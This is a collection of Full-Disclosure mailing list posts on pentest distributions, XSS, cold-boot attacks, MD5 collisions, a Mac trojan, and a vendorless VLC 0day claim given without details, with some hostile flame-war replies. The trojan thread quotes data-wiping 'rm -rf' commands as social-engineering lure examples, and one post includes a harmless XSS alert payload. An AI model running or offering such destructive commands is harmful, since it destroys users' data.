Re: [Full-disclosure] Pentesting Distributions or Projects for Raspberry Pi
Hey, that's nice dude :) Thanks for the link! ~Jay On Thu, May 23, 2013 at 6:34 AM, Carlos Pantelides carlos_panteli...@yahoo.com wrote: Jay: Do you know other projects, distributions, and installer kits for Raspberry PI aside from the distributions and kits mentioned in this article: http://resources.infosecinstitute.com/pentesting-distributions-and-installer-kits-for-your-raspberry-pi/ ? Nice link. I've added a slight modification to w3af in order to turn on and off some leds and give feedback in a head-less uncontrolled scan scenario. http://seguridad-agile.blogspot.com/2013/05/w3af-on-raspberry-pi.html Carlos Pantelides @dev4sec http://seguridad-agile.blogspot.com/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] Pentesting Distributions or Projects for Raspberry Pi
Hey there guys, Do you know other projects, distributions, and installer kits for Raspberry PI aside from the distributions and kits mentioned in this article: http://resources.infosecinstitute.com/pentesting-distributions-and-installer-kits-for-your-raspberry-pi/ ? I am very much interested in trying out new projects :) Also lately I have been addicted to RetroPie ( https://github.com/petrockblog/RetroPie-Setup) ahahhaha although it is not related to security really but I just love emulating some cool and classic games from SNES. Regards, Jay Turla http://resources.infosecinstitute.com/author/jay-turla/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] 0day Vulnerability in VLC (this is my first release of the vuln anywhere)
if VLC media player is launched in QT mode and the user is on windows NT (any version of windows so far as tested) connected to the internet there is a vulnerability in the handling of unicast packets. The Proof of concept code is in development and should be ready for publishing within the next 2 weeks. More in depth vulnerability information will be released with the proof of concept. This is a joint effort (the POC (proof of concept) code and vuln discovery) by 2 security firms. 4sData IT solutions and another firm that would like to remain nameless for the time being. This vulnerability exposes almost everyone using VLC media player (unless on linux systems and thats just because of the lack of testing so far may still be found to be exposed.). Thank you for your time and if interested please respond and let me know,. - Jay @ 4sData-IT-Solutions (www.4sdata.com - coming soon) P.S. Launching 4sData this week to coincide with the VLC vuln. ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] agile hacking?
Ummm, You two both have each others personal emails so why dont you flame each other in private. The question to each is that do you feel that your comments to each other further this list and knowledge or hurt it. This is FD not my pee pee is bigger than yours... These words are just consuming energies that could be better served hacking the [EMAIL PROTECTED] out of something. Jay - Original Message - From: Petko D. Petkov [mailto:[EMAIL PROTECTED] To: [EMAIL PROTECTED],full-disclosure@lists.grok.org.uk Sent: Wed, 19 Mar 2008 11:08:31 + Subject: Re: [Full-disclosure] agile hacking? reepex, you are the only one backing up troth, read on all comments... I don't bash people. I encourage them and this is present in all my work and the work behind the GNUCITIZEN umbrella. Not I, but the crowd hanged him, as well they will hang you for your arrogant, egocentric, foolish and rather juvenile behavior. I personally don't care about you, nor I care if you like the work on GNUCITIZEN or even my work. In my eyes and the eyes of others you follow very basic parasitic social pattern: making a name for yourself not based on your knowledge but based on your arrogant, bottomless comments. You don't lead by example! You are a parasite, a vampire, sucking blood and energy from those around you. I hardly doubt that anyone can consider you as a friend or even appreciate your skills and knowledge when you are nothing more but a vulture. Comparing the Agile Hacking project with books such as How to Own a Continent (by FX, Paul Craig, Joe Grand, and Tim Mullen...), How to Own the Box (by Ryan Russell, Ido Dubrawsky, FX, and Joe Grand...), How to Own a Shadow (by Johnny Long, Tim Mullen, and Ryan Russell...), The Art of Intrusion (by Kevin D. Mitnick, and William L. Simon..) and the Hacking Exposed series (by some of the most recognized information security experts such as, but not only, Johnny Cache, Chris Davis, Stuart McClure, Joel Scambray, Andrew Vladimirov, Brian Hatch, David Endler...), is nothing but a flattering comment. I hope that this project achieves and even superseeds their success. These are some of my favorite books and I have a great respect for their authors. You and all others who support your dieing cause and who have repeatedly attacked what we have build from scratch with far too many sacrifaces, can laugh now but the simple fact is that you will never even come close to what we have already achieved and gave to this community. You and all other Full-disclosure trolls proved to be untrustworthy, unworthy even creatures. I hope that your real identities stay well hidden behind your nicknames as I highly doubt that you will succeed in life. If I were in your place I would have reconsidered my values. Your and the other trolls comments are not satire but idiocracy as a fellow GNUCITIZEN reader have pointed out. Kind Regards, pdp founder of GNUCITIZEN, information security research, penetration tester, life hacker, co-author of two best-selling books, author of numerous printed publications and online media outlets, active speaker and opinion former, hacker culture evangelist, founder of Hakiri, entrepreneur, lecturer, etc... I am far behind the people I look after for inspiration and guidance but I am well ahead of you. On Wed, Mar 19, 2008 at 8:35 AM, reepex [EMAIL PROTECTED] wrote: so no one respects me, i bash people's projects, etc... whatever. You still do not explain why you have the attitude that any who does not like your work or ideas is a talentless troll that you can brush off. On Wed, Mar 19, 2008 at 2:40 AM, Petko D. Petkov [EMAIL PROTECTED] wrote: Dear Reepex, Unfortunately, you've already lost all the respect for a larger portion of people on this mailing list as well outside of it. You have never led by example but by bashing people on what they try to accomplish. Everyone who has been in this industry/life style for long enough know that they don't know everything. In fact, as the saying goes: A wise man never knows all, only fools know everything. My advise to you is to stop pretending being someone and be who you are. If you think that this project is crap then help to make it better. Everyone that has ever written a book, knows how hard it is to put everything together and how frustrating it is to want to put the things that you want not having the chance to do so. It is easier to say what is crap but 100x harder to do it wright. Also, it is very easy to take apart people from what they have accomplished, I've done it myself: http://www.gnucitizen.org/blog/hamster-plus-hotspot-equals-web-20-meltdown-not/ but 100 of times harder to put yourself in their shoes: http://www.gnucitizen.org/blog/reconsidering-the-side-jacking-attack/ Again, lead by example not by baseless comments. Regards, pdp On Wed, Mar 19, 2008 at 3:59 AM, Nate McFeters [EMAIL PROTECTED] wrote: Ok, I'll buy
[Full-disclosure] IE8 beta is available - Challenge
Who can be the one to find and publish the first exploit? http://www.microsoft.com/windows/products/winfamily/ie/ie8/readiness/Install.htm Jay ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] round and round they go
I would think a more realistic scenario might be a person working at an airport shutting their system down then getting it stolen vs a forensic examiner yanking the cord on purpose. Just an observation. - Original Message - From: matthew wollenweber [mailto:[EMAIL PROTECTED] To: [EMAIL PROTECTED] Cc: full-disclosure@lists.grok.org.uk Sent: Fri, 22 Feb 2008 09:57:55 -0500 Subject: Re: [Full-disclosure] round and round they go I found the article interesting, but I wonder about it's practicality. If you have physical access to the box you never really need to power down the box in the first place and generally if the box is already on, I think most people would prefer to attack a service to get on the system directly. But there are some special cases where these techniques will likely be very useful. For me, I've always disliked the practice of doing live forensic discovery. I'd much rather get a clean disk dump than to poke around on the system first, but losing RAM sucks. Maybe now IR/Forensic guys can get the best of both worlds? They can yank the power to save the disk state and dump memory by using the techniques described in the article. :) On Fri, Feb 22, 2008 at 8:32 AM, niclas [EMAIL PROTECTED] wrote: http://blog.wired.com/27bstroke6/2008/02/researchers-dis.html (cooling down DRAMs keeps their contents for longer time, even during reboot.) well, this shows how important mechanical security still is, even with all the crypto-stuff out there. if you e.g. just *glued* your RAM modules into your motherboard, the option left would be booting a malicious OS. a BIOS-password might put delays on that. so, if it is really secret put your PC in a locked steel box! as a dircet countermeasure you might as well consider a simple temperature sensor next to your DRAMs, releasing [evil self-destruction hack] when temperatures drop below 0?C. thermite does a good job on destroying HDDs but it's very dangerous. it's probably more easy to use this device then: http://www.wiebetech.com/products/HotPlug.php looking at these two methods, i notice how they (whoever) seem to aim not only on physical access but also more and more on surprising the crypto-user. they might use the methods mentioned above or just hit you with a flashbang, so you can't press the lock key anymore. this worries me more than any it-related security flaw. i don't want the police to behave like that. n. ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ -- Matthew Wollenweber [EMAIL PROTECTED] | [EMAIL PROTECTED] www.cyberwart.com ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] round and round they go
hrm. sigh. Normal moles not being able to grasp trivial knowledge. Airports are duh known conduits of business travellers with lots of data, thus increasing the possibility of targeting a more valuable target. So your statement that only ordinary criminals steal at airports is shortsighted. If anything a common criminal isnt going to try and steal at a place with a fucking million security cameras around. You obviously dont have enough of a grasp of the techniques to understand this thread so drop back off. You hardly need a barrel of liquid nitrogen - If you could summon not a barrel but more of a can of clue you would be better off. Jay - Original Message - From: niclas [mailto:[EMAIL PROTECTED] To: full-disclosure@lists.grok.org.uk Cc: [EMAIL PROTECTED],[EMAIL PROTECTED] Sent: Sat, 23 Feb 2008 01:16:48 +0100 Subject: Re: [Full-disclosure] round and round they go I would think a more realistic scenario might be a person working at an airport shutting their system down then getting it stolen vs a forensic examiner yanking the cord on purpose. Just an observation. if somebody steals your notebook at the air port the chance of this person just beeing an ordinary criminal not interested in your data is very high. and if you just shut down your notebook, the DRAMs are still warm, decreasing the time window for an ice-spray-attack. so, unless the notebook is thrown into a barrel of liquid nitrogen... n. ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] [ NNSquad ] Verizon's access via their provided Actiontec MoCa router (fwd)
-- Forwarded message -- Date: Fri, 08 Feb 2008 16:04:00 -0500 From: Andrew C Burnette [EMAIL PROTECTED] To: [EMAIL PROTECTED] [EMAIL PROTECTED] Subject: [ NNSquad ] Verizon's access via their provided Actiontec MoCa router Hey folks, In discussion with Lauren (off list) I recalled the following info that might be of interest to any FIOS users who actually want their home network to be a bit more secure. During a recent UPS battery swapout, I got stuck with a verizon 'dead' DHCP lease (it would not lease me an IP address). VZ Tech support was able to access and verify the configuration, code rev, and connectivity on the Actiontec router, despite there being no visible external IP address (according to my web view on the box) on the router. To me, that equals no security if they (unknown they...) can access my LAN or router without even their router logs showing such external access. Not good. Anyway, in bridge mode, I run a software firewall behind it, which does the actual DHCP request and is my external visible IP to the world. You can still do all the normal stuff, using the Actiontec as a MoCa to Ethernet interface (NIM). Best regards, Andy Burnette ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] on xss and its technical merit
Saying XSS isn't a vulnerability is like like saying a binary that has a buffer overflow isn't vulnerable. XSS needs javascript , binary needs its own malcode as well. Every vulnerability needs a medium to be exploited. Naysayers of XSS want some elegant exciting actions. Its not. Its a case of not sanitizing input that allows arbitrary code to be executed. Simple things like umm secure coding, url scan, mod_security, noscript could combat this easily. Its like someone walking past a car and seeing a million dollars sitting in the front seat. Thief opens unlocked door and takes money. Now a more elegant way would be to manipulate the chemical composition of the glass back to a gaseous form and reaching through. Either way the loot is gone. I really dont understand why some in this community are so quick to say this is no find, this isnt new, this is insert blah. I guess it makes them feel intelluctually superior to tear down the ideas of others whether they deserve it or not. In some cases they do. Are members of this community so starved for their own self worth that they strive to squash the ideas of others instinctively? Would make for a interesting study. Jay scriptalert('YAY!')/script - Original Message - From: Fredrick Diggle [mailto:[EMAIL PROTECTED] To: [EMAIL PROTECTED] Cc: full-disclosure@lists.grok.org.uk Sent: Wed, 12 Dec 2007 13:17:18 -0600 Subject: Re: [Full-disclosure] on xss and its technical merit Thank you info sec guru for your glowing review. Did you even read my post? I think I explained quite succinctly why XSS is not a vulnerability. Do you have some argument with what I posted or are you going to stick with criticizing my tone? You win oh guru of the info sec industry thing. 3 fredrick YAY! On Dec 12, 2007 12:57 PM, Jay [EMAIL PROTECTED] wrote: Its amazing the last 2 posters even have to time to read FD. With all the super important super secret projects they must be working. They preface everything with Im not going to put much thought into this then proceed to vomit a bunch of useless rhertoic throwing in how trivial it is and how much experience they have beating up 10 year olds or something. I actually think this thread should die as 1 side of the house believes XSS and XSRF as viable attack vectors. The other side thinks its rubbish. So let it die and then all the folks who are so bored yawn with XSS and CSRF can post their remarkable works and amaze us all. Jay - Original Message - From: Fredrick Diggle [mailto:[EMAIL PROTECTED] To: full-disclosure@lists.grok.org.uk Sent: Wed, 12 Dec 2007 12:21:14 -0600 Subject: Re: [Full-disclosure] on xss and its technical merit What no one seems to realize is that XSS by its very nature is not a vulnerability. It is a perfectly valid mechanism to aid in exploitation but can anyone cite me an example where xss in and of itself accomplishes anything? I can think of pretty much 3 examples of XSS (granted without giving it much thought because lets face it it isn't worth much thought) 1. you are taking something from a user which is accessible from the scripting language context of their browser. In this case the vulnerability is not XSS the vulnerability is either that you (or the web browser) are storing something valuable in an insecure way. The most obvious example of this is something like session cookies which if your auth/session management is implemented in a secure way won't matter a bit. It follows that the vulnerability is not XSS but instead that some developer stored something valuable in a stupid way. All of the retards on the list will no doubt ask me for a secure session management schema but I am a firm believer that sharing is communism so screw you. 2. You are forcing the users browser to make a request and complete some task within the context of the application. In this case again the vulnerability is not XSS but instead that the application allows users to do important things without verifying who they are. this is request forgery not xss, xss is only the mechanism by which the exploit is carried out. so again xss is not a vulnerability. 3. You are doing some other funkiness through the scripting language (all that crap about internal network scanning comes to mind) AGAIN this is not a vulnerability. If it is possible to do this crap through xss then it is also possible through any website the user visits. That means that if this crap is doable then you should report it to the guys who develop the scripting language backend and not some guy who doesn't sanitize things that he outputs. so once more the vulnerability is NOT xss it is an issue with the scripting language. The only other case that you could make for this is ui defacement I guess but in that case the vuln is not xss but that the developer didn't properly separate user generated content from backend content to make it clear that the content in these areas
Re: [Full-disclosure] on xss and its technical merit
I would say that XSS or CSRF is a means to an end. Its not that you can XSS is what you do with once you find it. Its not a sexy beast that you can blog about but it an attack vector none the less. The simpler the attack the greater the success. So yeah it takes little skill to find. It take equally little skill to securely code the app to sanitize in the first place. If an app is vuln to XSS chances are the rest of the app is crap anyways... Jay - Original Message - From: Byron Sonne [mailto:[EMAIL PROTECTED] To: [EMAIL PROTECTED],full-disclosure@lists.grok.org.uk Sent: Wed, 12 Dec 2007 09:48:07 -0500 Subject: Re: [Full-disclosure] on xss and its technical merit coderman wrote: so perhaps xss should be discussed much less is the only concrete thing we all agree on? FTW It's pretty obvious that finding XSS has a low entrance barrier; this explains its popularity. It's just not very impressive. At the same time, if finding an xss gets some kid interested in security, then I suppose it can't be all bad. In any case, wikipedia has something interesting on this, I never thought about how to categorize them, but then again, I usually start vomiting from boredom at the mere site of the word 'xss' in a subject line. From http://en.wikipedia.org/wiki/Xss, take it as you will: Type 0 This form of XSS vulnerability has been referred to as DOM-based or Local cross-site scripting, and while it is not new by any means, a recent paper (DOM-Based cross-site scripting) does a good job of defining its characteristics. With Type 0 cross-site scripting vulnerabilities, the problem exists within a page's client-side script itself. Type 1 This kind of cross-site scripting hole is also referred to as a non-persistent or reflected vulnerability, and is by far the most common type. These holes show up when data provided by a web client is used immediately by server-side scripts to generate a page of results for that user. If unvalidated user-supplied data is included in the resulting page without HTML encoding, this will allow client-side code to be injected into the dynamic page Type 2 This type of XSS vulnerability is also referred to as a stored or persistent or second-order vulnerability, and it allows the most powerful kinds of attacks. It is frequently referred to as HTML injection. A type 2 XSS vulnerability exists when data provided to a web application by a user is first stored persistently on the server (in a database, filesystem, or other location), and later displayed to users in a web page without being encoded using HTML entities. Cheers, B ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] on xss and its technical merit
Its amazing the last 2 posters even have to time to read FD. With all the super important super secret projects they must be working. They preface everything with Im not going to put much thought into this then proceed to vomit a bunch of useless rhertoic throwing in how trivial it is and how much experience they have beating up 10 year olds or something. I actually think this thread should die as 1 side of the house believes XSS and XSRF as viable attack vectors. The other side thinks its rubbish. So let it die and then all the folks who are so bored yawn with XSS and CSRF can post their remarkable works and amaze us all. Jay - Original Message - From: Fredrick Diggle [mailto:[EMAIL PROTECTED] To: full-disclosure@lists.grok.org.uk Sent: Wed, 12 Dec 2007 12:21:14 -0600 Subject: Re: [Full-disclosure] on xss and its technical merit What no one seems to realize is that XSS by its very nature is not a vulnerability. It is a perfectly valid mechanism to aid in exploitation but can anyone cite me an example where xss in and of itself accomplishes anything? I can think of pretty much 3 examples of XSS (granted without giving it much thought because lets face it it isn't worth much thought) 1. you are taking something from a user which is accessible from the scripting language context of their browser. In this case the vulnerability is not XSS the vulnerability is either that you (or the web browser) are storing something valuable in an insecure way. The most obvious example of this is something like session cookies which if your auth/session management is implemented in a secure way won't matter a bit. It follows that the vulnerability is not XSS but instead that some developer stored something valuable in a stupid way. All of the retards on the list will no doubt ask me for a secure session management schema but I am a firm believer that sharing is communism so screw you. 2. You are forcing the users browser to make a request and complete some task within the context of the application. In this case again the vulnerability is not XSS but instead that the application allows users to do important things without verifying who they are. this is request forgery not xss, xss is only the mechanism by which the exploit is carried out. so again xss is not a vulnerability. 3. You are doing some other funkiness through the scripting language (all that crap about internal network scanning comes to mind) AGAIN this is not a vulnerability. If it is possible to do this crap through xss then it is also possible through any website the user visits. That means that if this crap is doable then you should report it to the guys who develop the scripting language backend and not some guy who doesn't sanitize things that he outputs. so once more the vulnerability is NOT xss it is an issue with the scripting language. The only other case that you could make for this is ui defacement I guess but in that case the vuln is not xss but that the developer didn't properly separate user generated content from backend content to make it clear that the content in these areas does not express the views of the site blah blah blah legal mumbo jumbo. XSS is however a perfectly viable mechanism to aid in exploitation. For example lets say there is a command exec bug within an administrative interface of some app. You aren't able to exploit directly so you USE xss TO exploit indirectly. Saying that xss is a vulnerability is like saying that having a function pointer stored in memory is a vulnerability. Sure I can use it to take over your box is I can find a way to overwrite it but try implementing anything without it. I honestly kind of like where that would go though so lets take that to its logical conclusion. Everyone can get all upset every time they find a app that uses an object and then someone can get rich off of a method to waste memory by putting canaries around ever function pointer. It'll be fun and I'll never have to worry about finding a job. YAY! = Begin Drivel = I would say that XSS or CSRF is a means to an end. Its not that you can XSS is what you do with once you find it. Its not a sexy beast that you can blog about but it an attack vector none the less. The simpler the attack the greater the success. So yeah it takes little skill to find. It take equally little skill to securely code the app to sanitize in the first place. If an app is vuln to XSS chances are the rest of the app is crap anyways... Jay - Original Message - From: Byron Sonne [mailto:blsonne_at_rogers.com] To: coderman_at_gmail.com,full-disclosure_at_lists.grok.org.uk Sent: Wed, 12 Dec 2007 09:48:07 -0500 Subject: Re: [Full-disclosure] on xss and its technical merit coderman wrote: * so perhaps xss should be discussed much less is the only * * concrete thing we all agree on? * FTW It's pretty obvious that finding XSS has a low entrance barrier; this explains its popularity. It's just not very
[Full-disclosure] PlayStation 3 predicts next US president (fwd)
-- Forwarded message -- Date: Fri, 30 Nov 2007 05:29:35 +0100 From: Weger, B.M.M. de [EMAIL PROTECTED] Cc: [EMAIL PROTECTED], [EMAIL PROTECTED] Subject: PlayStation 3 predicts next US president Hi all, We (Marc Stevens, Arjen Lenstra and me) have used a Sony PlayStation 3 to correctly predict the outcome of the 2008 US presidential elections. See http://www.win.tue.nl/hashclash/Nostradamus if you want to know the details of what this has to do with cryptography. We also announce two different Win32 executables that have identical MD5 hash values. This can be made to happen for any two executable files. This implies a vulnerability in software integrity protection and code signing schemes that still use MD5. See http://www.win.tue.nl/hashclash/SoftIntCodeSign for details. Grtz, Benne de Weger - The Cryptography Mailing List Unsubscribe by sending unsubscribe cryptography to [EMAIL PROTECTED] ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] mac trojan in-the-wild
On Thu, 1 Nov 2007, Adam St. Onge [EMAIL PROTECTED] wrote: So if i put a picture of a naked girl on a website and said to see more you must open a terminal and enter rm -rf. Would we consider this a trojan...or just stupidity? Yes, a Trojan. Yes, stupidity on the part of the designer of the home system. There should be no way to destroy so much user data by the user just typing six characters into a terminal window. oo--JS. On 11/1/07, Alex Eckelberry [EMAIL PROTECTED] wrote: Let's not over-hype this-- while Apple's day has been coming, saying that users will be hit hard on something the user has to manually download, manually execute, and explicitly grant administrative privileges to is *way* over the top. The future of malware is going to be largely through social engineering. Does that mean we ignore every threat that comes out because it requires user interaction? Seems like whistling past the graveyard to me. Alex -Original Message- From: Thor (Hammer of God) [mailto:[EMAIL PROTECTED] Sent: Thursday, November 01, 2007 8:15 PM To: Gadi Evron; [EMAIL PROTECTED]; full-disclosure@lists.grok.org.uk Subject: RE: mac trojan in-the-wild For whoever didn't hear, there is a Macintosh trojan in-the-wild being dropped, infecting mac users. Yes, it is being done by a regular online gang--itw--it is not yet another proof of concept. The same gang infects Windows machines as well, just that now they also target macs. http://sunbeltblog.blogspot.com/2007/10/screenshot-of-new-mac- trojan.html http://sunbeltblog.blogspot.com/2007/10/mackanapes-can-now-can-feel- pain-of.html This means one thing: Apple's day has finally come and Apple users are going to get hit hard. All those unpatched vulnerabilities from years past are going to bite them in the behind. Let's not over-hype this-- while Apple's day has been coming, saying that users will be hit hard on something the user has to manually download, manually execute, and explicitly grant administrative privileges to is *way* over the top. I can sum it up in one sentence: OS X is the new Windows 98. Investing in security ONLY as a last resort losses money, but everyone has to learn it for themselves. Not the new Windows 98 by a long shot - saying that is just irresponsible. While Apple is not used to dealing with security in the same way that other companies are, comparing OSX to Windows 98 is not only a huge technical inaccuracy, but you also insult MAC users out there. OSX had UAC-like unprivileged user controls way before Vista did - let's not try to start some holy-war on this like people have tried to do with Windows vs Linux in the past. If you want to report this, then report it-- but say what it is, a totally lame user-must-be-drunk exploit that requires that all manner of things go wrong before it works -- otherwise people will think that you've dressed up as Steve Gibson for Halloween. t ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] mac trojan in-the-wild
On Thu, 1 Nov 2007, Paul Schmehl [EMAIL PROTECTED] wrote: --On November 1, 2007 6:31:39 PM -0400 Adam St. Onge [EMAIL PROTECTED] wrote: So if i put a picture of a naked girl on a website and said to see more you must open a terminal and enter rm -rf. Would we consider this a trojan...or just stupidity? I would consider it stupidity to think that that is comparable to a trojan. Paul Schmehl ([EMAIL PROTECTED]) I think, under the standard Unix system of permissions, this is a Trojan. Under the standard Unix system of permissions, every application running in my home directory can issue an 'rm -rf /home/me' and, without proper near in time backup, cause me much annoyance. The defect lies in the system of permissions. There exist systems of rolling off-machine backups and minimum privilege permissions systems, but they are not yet standard. oo--JS. Senior Information Security Analyst The University of Texas at Dallas http://www.utdallas.edu/ir/security/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] mac trojan in-the-wild
On Thu, 1 Nov 2007, Thor (Hammer of God) [EMAIL PROTECTED] wrote: That's an interesting figure (86% that is). Can you give us some insight into what you define as user interaction? If it is clicking a link or reading an HTML email, then OK. If it is opening an .exe from an email, I'd like to see what client you are talking about and what environment (meaning, what OS/email client and what did they have to do to get it to run). But specifically, how many were exploits where a user had to visit an untrusted site, download an executable, run it, and explicitly give it administrative credentials to run? Not just people running as administrator, but typing in the admin account credentials to run it as administrator as one has to do on OSX? My guess (and I'd really like to see details on your findings) is that most interactive issues are the more trivial interactive issues (like clicking a link and launching a vulnerable version of IE). But more importantly, let's look at things from the other side. Let's say I'm wrong, and that Gadi is right on target with his hit hard prediction and that we should be very concerned with this. Given the requirements here, that again being flagrant ignorance where all the above steps are executed (including the explicit admin part)-- what exactly are we supposed to do? If people are willing and able to go through the motions above what can we as security people do to prevent it? Far too many people in this industry are far too quick to point out how desperate the situation is at all turns, but I don't see many people offering real solutions. But you know, I have to say... If we are really going to consider this serious, and we are really going to define part of our jobs as being responsible for stopping people who have absolutely no concerns for what they do and are willing to enter their admin credentials into any box that asks for it, then I'd say that there is a *serious* misunderstanding about what security is, and what can be done about it-- either that, or I'm just in the wrong business. t Put in a better system of permissions. Use rolling backup. Have independent system activity watchers. These measures are just the first moves. Unix was not designed to be resistant to one million hostile actions per day by thousands of unknown attacking entities. But if you run standard Unix and you have a Net connection, that is what your Unix instance is exposed to. oo--JS. ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] mac trojan in-the-wild
On Thu, 1 Nov 2007, Paul Schmehl [EMAIL PROTECTED] wrote: --On November 1, 2007 10:14:50 PM -0400 Jay Sulzberger [EMAIL PROTECTED] wrote: On Thu, 1 Nov 2007, Paul Schmehl [EMAIL PROTECTED] wrote: --On November 1, 2007 6:31:39 PM -0400 Adam St. Onge [EMAIL PROTECTED] wrote: So if i put a picture of a naked girl on a website and said to see more you must open a terminal and enter rm -rf. Would we consider this a trojan...or just stupidity? I would consider it stupidity to think that that is comparable to a trojan. Paul Schmehl ([EMAIL PROTECTED]) I think, under the standard Unix system of permissions, this is a Trojan. Under the standard Unix system of permissions, every application running in my home directory can issue an 'rm -rf /home/me' and, without proper near in time backup, cause me much annoyance. The defect lies in the system of permissions. There exist systems of rolling off-machine backups and minimum privilege permissions systems, but they are not yet standard. Perhaps you don't understand what a trojan is. Its purpose is to take control of a machine to use it for purposes other than those to which its owner would put it and without the owners knowledge or permission. Destroying the machine is contrary to the design and purpose of a trojan. Paul Schmehl ([EMAIL PROTECTED]) If today, common usage of the word trojan in this context requires that the system continue to operate without alerting the legitimate user that the system has been compromised, then yes, my use of the word was wrong. But the Wikipedia article http://en.wikipedia.org/wiki/Trojan_horse_(computing) suggests that the Do 'rm -rf .' to see the pretty picture. Trojan satisfies the definition of Trojan: blockquote from=http://en.wikipedia.org/wiki/Trojan_horse_(computing) ... / In the context of computing and software, a Trojan horse, often rendered without capitalization or simply as trojan, is a software which purports to do a certain type of action, but in fact, performs another. ... / Types of Trojan horse payloads Trojan horse payloads are almost always designed to do various harmful things, but can also be harmless. They are broken down in classification based on how they breach and damage systems. The nine main types of Trojan horse payloads are: * Remote Access. * Email Sending * Data Destruction ... / /blockquote The thing I call a Trojan, and you do not, meets the first condition of the quote. And it seems to me to have a payload which commits Data Destruction. If I have used the word in a way tending to confusion, I apologize to all full-disclosurists. oo--JS. Senior Information Security Analyst The University of Texas at Dallas http://www.utdallas.edu/ir/security/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] UNSUBSCRIBE
On Mon, 8 Oct 2007, Jones, Jeff (Enterprise Security) [EMAIL PROTECTED] wrote: UNSUBSCRIBE Jeffrey A. Jones http://crackmonkey.org/faq.html#QUESTION3 oo--JS. Constellation Energy Group, Engineering Forensics- Information Security Management (443) 394-2959 mailto: [EMAIL PROTECTED] ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] [Discuss] Public comments are invited on GNSO Council's WHOIS reports and recommendations. (fwd)
-- Forwarded message -- Date: Sun, 16 Sep 2007 22:45:08 -0400 From: WWWhatsup [EMAIL PROTECTED] Reply-To: [EMAIL PROTECTED] To: [EMAIL PROTECTED], [EMAIL PROTECTED] Subject: [Discuss] Public comments are invited on GNSO Council's WHOIS reports and recommendations. http://www.icann.org/announcements/announcement-2-14sep07.htm Public comments are invited via email until 00:00 UTC (17:00 PDT) on 30 October 2007 on the GNSO Council's WHOIS reports and recommendations. Submit comments to: [EMAIL PROTECTED] View comments at http://forum.icann.org/lists/whois-comments-2007/. Background In March, 2007, a WHOIS Task Force convened by the GNSO Council in June, 2005 completed its final report. The Task Force was asked to address important questions related to WHOIS. Key questions included the purpose of WHOIS service, which information should be available to the public, how to improve WHOIS accuracy and how to deal with conflicts between WHOIS requirements and relevant privacy laws. In the final report, a simple majority of members of the WHOIS Task Force endorsed a proposal called the Operational Point of Contact (OPOC). Under OPOC, every registrant would identify a new operational contact and the technical and administrative contact details would no longer be displayed. The final WHOIS Task Force Report of 12 March, 2007 is posted at http://gnso.icann.org/issues/whois-privacy/whois-services-final-tf-report-12mar07.htm. Following completion of the Task Force Report and public comment period, on 28 March the GNSO Council issued a resolution creating a WHOIS Working Group to examine three issues and to make recommendations concerning how current policies may be improved to address these issues: 1. to examine the roles, responsibilities and requirements of the OPOC, and what happens if they are not fulfilled; 2. to examine how legitimate interests will access unpublished registration data; and 3. to examine whether publication of registration contact information should be based on the type of registered name holder (legal vs. natural persons) or the registrant's use of a domain name. The Whois Outcomes Working Group Report was finalized on 20 August, 2007. It is posted at http://gnso.icann.org/drafts/icann-whois-wg-report-final-1-9.pdf [PDF, 213K]. On 6 September 2007, the GNSO Council approved a resolution which, among other things, establishes a schedule for consideration of the WHOIS Task Force Report and the WHOIS Working Group Report. This schedule includes solicitation of further public comments and culminates in a public Council discussion and vote on 31 October 2007 during the Los Angeles ICANN. In addition, the resolution calls for ICANN staff to prepare a type of draft final report that references the Task Force Report, the Working Group Charter and the Working Group Report and which includes an overall description of the process. The following document, entitled, Staff Overview of Recent GNSO WHOIS Activity [PDF, 77K], has been prepared in response to the Council Resolution. It contains the full text of the GNSO resolution and the schedule for GNSO Council consideration of the reports. Again, further public comments are invited via email until 00:00 UTC (17:00 PDT) on 30 October 2007 on the GNSO Council's WHOIS reports and recommendations referenced above and summarized in the Staff Overview of Recent GNSO WHOIS Activity [PDF, 77K]. Submit comments to: [EMAIL PROTECTED] View comments at http://forum.icann.org/lists/whois-comments-2007/. -- Glen de Saint G?ry GNSO Secretariat - ICANN gnso.secretariat[at]gnso.icann.org http://gnso.icann.org --- WWWhatsup NYC http://pinstand.com - http://punkcast.com --- ___ 